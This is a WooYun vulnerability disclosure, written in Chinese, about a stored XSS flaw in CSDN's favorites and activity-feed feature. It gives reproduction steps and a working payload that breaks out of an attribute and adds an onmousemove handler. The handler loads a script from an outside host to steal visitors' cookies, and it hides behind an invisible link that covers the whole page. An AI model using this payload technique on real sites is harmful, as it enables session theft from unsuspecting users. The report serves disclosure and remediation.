漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-032584
漏洞标题:CSDN XSS第一弹:修复漏洞时指哪修哪的后果
相关厂商:CSDN开发者社区
漏洞作者: 橙夏
提交时间:2013-07-28 14:05
修复时间:2013-09-11 14:05
公开时间:2013-09-11 14:05
漏洞类型:xss跨站脚本攻击
危害等级:中
自评Rank:7
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-07-28: 细节已通知厂商并且等待厂商处理中
2013-07-28: 厂商已经确认,细节仅向厂商公开
2013-08-07: 细节向核心白帽子及相关领域专家公开
2013-08-17: 细节向普通白帽子公开
2013-08-27: 细节向实习白帽子公开
2013-09-11: 细节向公众公开
简要描述:
CSDN某存储XSS漏洞被爆出后未被完全修复,因此留下了可利用的机会。
求rank - -
详细说明:
问题在CSDN空间的“收藏”功能上。
我们可以把任意一个URL在空间发表出来,这个URL还能在个人动态里产生一个链接。
但是在动态里,输出这个链接的时候,过滤并不完全。虽然过滤了<>这样的字符,但是我们仍然可以通过闭合属性的方式,往URL里插入任意HTML属性,导致了xss爆发。
1、进入自己的空间收藏(http://my.csdn.net/my/favorite),点击添加
2、试着往链接里插入个test属性
3、来到我的主页(http://my.csdn.net/u011311506),可以看到,作为个人动态,属性原封不动地写了出来
4、要是加入的属性是onmousemove呢?这已经可以说明问题了,但是为了证明这个小洞可以较隐秘地偷走cookie,我在输入网址时构造了这么一行代码:
http://wooyun.org"
class="MikuXSS"
onmousemove="$.getScript('http://mikuxss.sinaapp.com/12CmMi');$('.MikuXSS').hide();"
style="font-size:1px;width:100%;height:100%;position:absolute;left:0px;top:0px;cursor:default;
显而易见,这个链接覆盖整个页面,当鼠标移动时就会加载指定脚本,将链接自动隐藏。
再弄个人畜无害的标题
5、这个网页看起来很正常,但你的cookies已经被偷走了。
漏洞证明:
修复方案:
htmlentities($_POST['url']);
此漏洞可用于蠕虫传播,未测试。(求rank- -
版权声明:转载请注明来源 橙夏@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-07-28 16:43
厂商回复:
谢谢报告
最新状态:
2013-07-29:已经修复漏洞。